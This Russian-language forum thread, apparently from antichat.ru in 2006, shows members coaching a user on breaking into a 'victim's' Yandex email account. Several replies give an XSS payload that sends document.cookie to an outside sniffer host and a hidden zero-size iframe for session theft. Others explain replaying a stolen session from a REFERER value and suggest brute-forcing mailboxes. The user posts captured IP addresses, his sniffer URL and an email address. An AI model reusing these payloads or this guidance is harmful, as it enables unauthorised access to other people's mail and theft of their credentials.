PDA

Просмотр полной версии : Кукии


Petr
13.06.2006, 00:10
Вопрос такой (знаю чт омного вопросы задаю, но я и почитал перед тем как задать)
как можн оукратсь куки для входа на почту жертвы?

Petr
13.06.2006, 00:21
а есть способ по легче типа, отослать писмо с приклиплёными данными, а куки придут мне.
или как взломать комп жертвы?
я вобще писмо отослал с с картинкой и там синфер. и на мой синфер пришли данные.
тока что с нимим делать я не понял.

Cold_Zer0
13.06.2006, 00:27
Теперь возми прогу CookieEditor и подделай куки.
Жаль не помню статей на эту тему...
Но со снифером ты всё сделал правильно(ну правильно, если это сработало), типа XSS что то получилось, а теперь возьми прогу которую я посоветовал выше и подделай куки!

+toxa+
13.06.2006, 00:33
Есть такая вещь как Xss.... в основном она используется для кражи кук... юзай поиск...

Petr
13.06.2006, 00:36
спасибо за ответы,
Я скачал прогу но я что то не понял как в ней поделовать куки,
можеш мне в аску постучатся пожалуйсто.

Petr
13.06.2006, 00:41
А то что я со снифером делала не то получается?

Гаврила
13.06.2006, 00:50
Какую почту ломаешь хоть?
Ну раз пришли куки,вставляй в адресную строку.
Скорей всего пришли не куки,а сессия.

bul.666
13.06.2006, 01:01
Покопайся в видео! Какой сервер? Юзай сниффер! Зайди сюды http://antichat.ru/sniff/

Petr
13.06.2006, 01:09
так я уже поюзал! и пришла именно сесия, но как её использовать? в адресну вставляю говарит логи пиши и пароль , сервер яндекс.

Гаврила
13.06.2006, 01:13
Куки в студию.
Либо не то пришло,либо жертва нажала на кнопачку выход,после пользования ящиком.
И сессия погибла...

bul.666
13.06.2006, 01:20
Может там проверка по Ip

Petr
13.06.2006, 14:56
Да она начала на конопочку однозначно

вот что мне пришло

IP: 194.126.101.133 Real IP: 213.35.139.81
QUERY: ;
REFERER: http://simg.mail.yandex.net/simg/s.gif?aid=ddae1662ba3e0d3c31995d4d205f714a
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

bul.666
13.06.2006, 16:21
Игиде здесь сессия?!!!

Sn@k3
13.06.2006, 16:27
что стоит в строке, а точнее после слова QUERY, то это тебе и надо. ).зайди на video.antichat.ru , там просто ПОЛНО этого.

bul.666
13.06.2006, 16:35
В query обычно передаются данные после snif.jpg?[QUERY]/// Тут обычно бывают кукии. Но не сессия!

Покажи нам как ты отправлял сниффер!

Petr
13.06.2006, 16:40
я сделал все как в теме угон сесии яндекс.

Petr
13.06.2006, 16:44
тока что посмотрел это видио, и хотел спросить а этот хтмл код где можно взять?
http://video.antichat.ru/file51.html

bul.666
13.06.2006, 16:50
Какой код?! Как вставлять снифер?!

Petr
13.06.2006, 16:54
ну да

bul.666
13.06.2006, 17:03
<iframe src="адрес сниффера" width=0 height=0>#</iframe> - Это для сессии...

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Это для КУКИСОВ!

Ты должен отправлять письма в формате HTML

Petr
13.06.2006, 17:31
А если в фото (ерзе блокнот) прописать, то не получится?

bul.666
13.06.2006, 17:33
Всмысле?

Petr
13.06.2006, 17:36
открыть фото через болокнот туда это вписать, а потом когда получатель откроет на снифер придут данные, так можно? вереня это будет работать?

Petr
13.06.2006, 17:38
всё щяс проверил, не работает
тогда скажи а в яндексе как можно в виде html посылать?

Я там когда посылаю вроде как выбрав с форматирование хтмл
а когда псимо приход видет это всё как текст
кароч ты можеш послать мне правельно на почту gh266@yandex.ru
а мой снифер http://antichat.org/s/266.gif

буду блогодарен.

bul.666
13.06.2006, 17:49
Вообще при регистрации ты выбираешь формат писем! И посмотри в насройках "Персональные данные"... Но это помойму на прием! Хотя хз. Я им яндексом не юзаюсь

Гаврила
13.06.2006, 19:06
открыть фото через болокнот туда это вписать, а потом когда получатель откроет на снифер придут данные, так можно? вереня это будет работать?
Всё будет работать.
Перед тем как спрашивать,пробуй всё на себе,много вопросов отпадёт.
Пришли сам себе картинку.Потом иди на сниффер,забирай строку REFERER и вставляй её в адресную строку.Попадёш в свой ящик.
Условия:
Жертва не должна нажать кнопку выход.
При входе в ящик у жертвы должна стоять галка в поле "не спрашивать две недели"
Ну и много разных ньюансов,типа привязка IP и т.д.
Так что всё зависит от степени ламеризма и лени жертвы.

Petr
14.06.2006, 00:13
Не, если стока условий то снифер однозначно отподает. я себе пробовал, ну нечего не получилось просто.
а кроме брутус больше не остатется способов ломать ящики?

nc.STRIEM
14.06.2006, 01:15
<iframe src="адрес сниффера" width=0 height=0>#</iframe> - Это для сессии...

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Это для КУКИСОВ!

Ты должен отправлять письма в формате HTML
А эта шняга на mail.ru работает??? Я пробовал, не получилось... Есле скрипт посылать, то его блокирует, а есле картинку, то ничего не происходит....

Гаврила
14.06.2006, 01:18
Способов куча. http://forum.antichat.ru/thread9930.html
Но если у тебя на своём ящике не получилось,то тяжко будет чужой ломать.